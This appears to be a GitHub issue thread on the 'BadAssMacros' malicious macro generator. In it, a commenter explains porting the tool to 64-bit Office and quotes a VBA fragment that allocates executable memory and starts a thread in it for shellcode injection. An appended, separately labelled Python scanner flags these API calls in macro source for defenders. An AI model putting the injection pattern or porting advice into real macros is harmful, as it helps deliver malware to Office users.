Inf0secRabbit / BadAssMacros

BadAssMacros - C# based automated Malicious Macro Generator.

Porting to x64 Office support #4

Open 0xbad53c opened 3 years ago

0xbad53c commented 3 years ago

Hi guys,

Just wanted to post this here in case anyone was wondering how to add x64 support. Essentially, you should replace all x86 "Long" pointer types with "LongPtr" types. This vbtype will automatically select the "Long" for x86 and "LongLong" for x64. Do not just blindly replace Long, but look at the Win32 API specification and convert types appropriately. If a Win32 API parameter or result is not a pointer, it should not be converted to "LongLong" and therefore "LongPtr" should not be used.

The following example could help: https://gist.github.com/rmdavy/43ce9872080a2a37fe54a10a6d9b0f1c Also take into consideration the following from Sevagas' blog on MacroPack Pro https://blog.sevagas.com/Launch-shellcodes-and-bypass-Antivirus-using-MacroPack-Pro-VBA-payloads :

```vb
Dim allocatedAddr As LongPtr ' Long or LongLong depending on architecture
#If Win64 Then
allocatedAddr = IndirectWin32Call("kernel32", "VirtualAlloc", vbLongLong, 0&, UBound(buffToInject), &H1000, &H40) ' vbLongLong is mandatory as returned address is 64bit
...
Dim nullValue as LongPtr  ' Or instead use 0^ for LongLong zero directly as function argument
nullValue = 0
result = IndirectWin32Call("kernel32", "CreateThread", vbLong, nullValue, nullValue, allocatedAddr, nullValue, 0, nullValue) 'DispCallFunc needs precise type for arguments. LongLong zero is not the same as Long zero.
```

This information helped me a lot for x64 Shellcode injection. I hope this makes it less time-consuming for other people in the future.
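For anyone triaging macro source, an added example (not part of this thread or of the BadAssMacros project): a Python scan over extracted VBA text that flags the two API references in the snippet above, whether they appear in a `Declare` statement or as string literals handed to an indirect-call helper. The sample input is constructed, with its last two lines taken from the quoted snippet; the rule names and the `WATCHED_APIS` set are this example's own assumptions.

```python
import re

# APIs named in the snippet quoted on this page (assumed watch list; extend as needed).
WATCHED_APIS = {"virtualalloc", "createthread"}
RWX_FLAG = re.compile(r"&H40\b", re.I)  # PAGE_EXECUTE_READWRITE
DECLARE = re.compile(r"\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)", re.I)
STRING_LITERAL = re.compile(r'"((?:[^"]|"")*)"')

# Constructed sample: a benign declare, a comment, then two lines from the snippet.
SAMPLE = '''\
Private Declare PtrSafe Function GetTickCount Lib "kernel32" () As Long
' VirtualAlloc is only mentioned in this comment
allocatedAddr = IndirectWin32Call("kernel32", "VirtualAlloc", vbLongLong, 0&, UBound(buffToInject), &H1000, &H40) ' vbLongLong is mandatory
result = IndirectWin32Call("kernel32", "CreateThread", vbLong, nullValue, nullValue, allocatedAddr, nullValue, 0, nullValue)
'''


def strip_comment(line):
    """Drop a trailing apostrophe comment, ignoring apostrophes inside strings."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line


def scan_vba(source):
    """Return (line_no, rule, api) findings for watched Win32 API references."""
    findings = []
    for no, raw in enumerate(source.splitlines(), 1):
        code = strip_comment(raw)
        m = DECLARE.search(code)
        if m and m.group(1).lower() in WATCHED_APIS:
            findings.append((no, "declare", m.group(1)))
        # String literals cover Alias clauses and names resolved at run time.
        for lit in STRING_LITERAL.findall(code):
            if lit.lower() in WATCHED_APIS:
                findings.append((no, "api-string", lit))
                if lit.lower() == "virtualalloc" and RWX_FLAG.search(code):
                    findings.append((no, "rwx-allocation", lit))
    return findings


def allocates_and_runs(findings):
    """True when both allocation and thread creation are referenced."""
    return WATCHED_APIS <= {api.lower() for _, _, api in findings}
```

A source file that only names these APIs in comments produces no findings, since comments are stripped before matching.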

aress31 commented 2 years ago

Any update on this?